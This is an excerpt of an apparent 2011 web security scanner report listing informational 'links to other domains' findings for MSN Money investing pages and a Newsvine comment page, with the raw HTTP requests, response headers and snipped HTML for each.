<div class="normal"><a href="http://lovesssappsss1.newsvine.com/">Lovesss appsss</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mikeamerson.newsvine.com/">mike amerson</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mikeamerson.newsvine.com/">mike amerson</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://keith-1135394.newsvine.com/">keith-1135394</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star7" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://goorganic2.newsvine.com/">go organic</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Calidudebeautifull.newsvine.com/">Calidude69bella</a>
...[SNIP]...
<div class="normal"><a href="http://mikeamerson.newsvine.com/">mike amerson</a>
...[SNIP]...
<div class="normal"><a href="http://Dizzal.newsvine.com/">minnysotaboy</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://rvanderbrink.newsvine.com/">PuddleDuck</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://rodentrack.newsvine.com/">Rodentrack</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://ToastyMcGrath.newsvine.com/">Toasty McGrath</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://4570govt.newsvine.com/">2blunt4drivels</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://belzebu.newsvine.com/">Belzebu</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://tooquiet4me2005.newsvine.com/">MS in VA</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://davidam1262.newsvine.com/">david1262</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://MsMeredith.newsvine.com/">Ms.Meredith</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://goorganic2.newsvine.com/">go organic</a>
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
<div class="normal"><a href="http://Kinjiru.newsvine.com/">Kinjiru</a>
...[SNIP]...
<div class="normal"><a href="http://jtj.newsvine.com/">JIM-254362</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://Dizzal.newsvine.com/">minnysotaboy</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Marcusarilius.newsvine.com/">Marcusarilius</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://ronnkelley.newsvine.com/">Truckin Ronn</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://mrwashburn.newsvine.com/">mrwashburn</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://YeenVeen.newsvine.com/">YeenVeen</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Kinjiru.newsvine.com/">Kinjiru</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://mikeamerson.newsvine.com/">mike amerson</a>
...[SNIP]...
<div class="normal"><a href="http://TishomingoKid.newsvine.com/">skip Nicholson, Oklahoma City</a>
...[SNIP]...
<div class="normal"><a href="http://robert8777.newsvine.com/">Robert8777</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://nothappy2494184.newsvine.com/">nothappy-2494184</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://windabenedetti.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/windabenedetti-1131361638.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="follow winda benedetti on twitter"><a href="http://twitter.com/windabenedetti">Follow Winda Benedetti on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://toddkenreck.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://ingame.newsvine.com/">In-Game</a>
...[SNIP]...
<li class="todd kenreck on facebook"><a href="http://www.facebook.com/todd.kenreck">Todd Kenreck on facebook</a>
...[SNIP]...
<li class="todd kenreck on twitter"><a href="https://twitter.com/ToddKenreck">Todd Kenreck on twitter</a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&amp;mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.95. http://investing.money.redacted/investments/charts

Summary

Severity:   Information
Confidence:   Certain
Host:   http://investing.money.redacted
Path:   /investments/charts

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /investments/charts?Symbol=indu HTTP/1.1
Host: investing.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ASP.NET_SessionId=d3e1tw3231xscnog3b1tosiy; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:08:33 GMT
Content-Length: 49553
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir="ltr" lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
<meta name="keywords" content="stock charts,stock market chart,stock chart" /><link rel="Shortcut Icon" href="http://col.stc.s-redacted/br/gbl/lg/csl/favicon.ico" type="image/x-icon" /><link rel="stylesheet" type="text/css" href="http://investing.money.redacted/sc/css/b0/8f83b90988ff7b93ae75bc90f904a8.css" media="all" />
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a></li><li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
<a href="http://mail.live.com/" class="flytrigger unreadcount">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com/">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&mkt=en-US">Bing</a>
...[SNIP]...
<li class="first ">
<a id="hplink" href="http://www.myhomeredacted/">Make MSN your homepage</a>
<a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search">
Web</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a>
...[SNIP]...
<li class="flyout noscript"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/" >Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm" >click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/" >BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/" >Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/" >Morningstar Inc</a>. Analyst recommendations data provided by <a href="http://www.zacks.com/" >Zacks Investment Research</a>... IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml" >Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm" >SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/" >Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/" >CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a>
<a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj" >Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise</a>
...[SNIP]...
<li class="last"><a class="popuplink" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=tOFDfuEU&amp;resize=false">Feedback</a>
...[SNIP]...

22.96. http://investing.money.redacted/investments/currency-exchange-rates/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://investing.money.redacted
Path:   /investments/currency-exchange-rates/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /investments/currency-exchange-rates/?symbol= HTTP/1.1
Host: investing.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ASP.NET_SessionId=d3e1tw3231xscnog3b1tosiy; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:08:45 GMT
Content-Length: 35170
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir="ltr" lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
ck quote,stocks,change,volume,day's high,day's low,open,previous close,bid,ask,52 week high,52 week low,P/E,Earnings/Share,Dividend/Share,Current Div. Yield,Market Capitalization,Shares outstanding" /><link rel="Shortcut Icon" href="http://col.stc.s-redacted/br/gbl/lg/csl/favicon.ico" type="image/x-icon" /><link rel="stylesheet" type="text/css" href="http://investing.money.redacted/sc/css/b0/8f83b90988ff7b93ae75bc90f904a8.css" media="all" />
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a></li><li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
<a href="http://mail.live.com/" class="flytrigger unreadcount">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com/">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&mkt=en-US">Bing</a>
...[SNIP]...
<li class="first ">
<a id="hplink" href="http://www.myhomeredacted/">Make MSN your homepage</a>
<a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search">
Web</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a>
...[SNIP]...
<li class="flyout noscript"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj" >
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise</a>
...[SNIP]...
<li class="last"><a class="popuplink" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=tOFDfuEU&amp;resize=false">Feedback</a>
...[SNIP]...

22.97. http://investing.money.redacted/investments/market-index/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://investing.money.redacted
Path:   /investments/market-index/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /investments/market-index/?symbol= HTTP/1.1
Host: investing.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ASP.NET_SessionId=d3e1tw3231xscnog3b1tosiy; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:08:41 GMT
Content-Length: 35170
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir="ltr" lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
ck quote,stocks,change,volume,day's high,day's low,open,previous close,bid,ask,52 week high,52 week low,P/E,Earnings/Share,Dividend/Share,Current Div. Yield,Market Capitalization,Shares outstanding" /><link rel="Shortcut Icon" href="http://col.stc.s-redacted/br/gbl/lg/csl/favicon.ico" type="image/x-icon" /><link rel="stylesheet" type="text/css" href="http://investing.money.redacted/sc/css/b0/8f83b90988ff7b93ae75bc90f904a8.css" media="all" />
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a></li><li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
<a href="http://mail.live.com/" class="flytrigger unreadcount">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com/">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&mkt=en-US">Bing</a>
...[SNIP]...
<li class="first ">
<a id="hplink" href="http://www.myhomeredacted/">Make MSN your homepage</a>
<a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search">
Web</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a>
...[SNIP]...
<li class="flyout noscript"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj" >
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise</a>
...[SNIP]...
<li class="last"><a class="popuplink" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=tOFDfuEU&amp;resize=false">Feedback</a>
...[SNIP]...

22.98. http://investing.money.redacted/investments/stock-price

Summary

Severity:   Information
Confidence:   Certain
Host:   http://investing.money.redacted
Path:   /investments/stock-price

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /investments/stock-price?Symbol= HTTP/1.1
Host: investing.money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; ASP.NET_SessionId=d3e1tw3231xscnog3b1tosiy; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:08:30 GMT
Content-Length: 35170
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html dir="ltr" lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...
ck quote,stocks,change,volume,day's high,day's low,open,previous close,bid,ask,52 week high,52 week low,P/E,Earnings/Share,Dividend/Share,Current Div. Yield,Market Capitalization,Shares outstanding" /><link rel="Shortcut Icon" href="http://col.stc.s-redacted/br/gbl/lg/csl/favicon.ico" type="image/x-icon" /><link rel="stylesheet" type="text/css" href="http://investing.money.redacted/sc/css/b0/8f83b90988ff7b93ae75bc90f904a8.css" media="all" />
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://col.stj.s-msn.com/br/sc/js/jquery/jquery-1.4.2.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/beta/0909/MicrosoftAjaxTemplates.js"></script>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV">Travel</a></li><li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li id="hotmail" class="flyout noscript">
<a href="http://mail.live.com/" class="flytrigger unreadcount">Hotmail</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=inbox">Inbox</a>
...[SNIP]...
<li><a href="http://calendar.live.com/">Calendar</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=contacts">Contacts</a>
...[SNIP]...
<li><a href="http://mail.live.com/?rru=compose">Send e-mail</a>
...[SNIP]...
<li id="messenger"><a href="http://explore.live.com/windows-live-messenger">Messenger</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&mkt=en-US">Bing</a>
...[SNIP]...
<li class="first ">
<a id="hplink" href="http://www.myhomeredacted/">Make MSN your homepage</a>
<a id="binglink" href="http://www.bing.com/customizeBrowser">Make Bing your decision engine</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search">
Web</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a>
...[SNIP]...
<li class="flyout noscript"><a class="flytrigger" href="https://secure.bundle.com/msn">My Money</a>
...[SNIP]...
<a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj" >
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise</a>
...[SNIP]...
<li class="last"><a class="popuplink" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=tOFDfuEU&amp;resize=false">Feedback</a>
...[SNIP]...

22.99. http://investing.money.redacted/investments/stock-price/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://investing.money.redacted
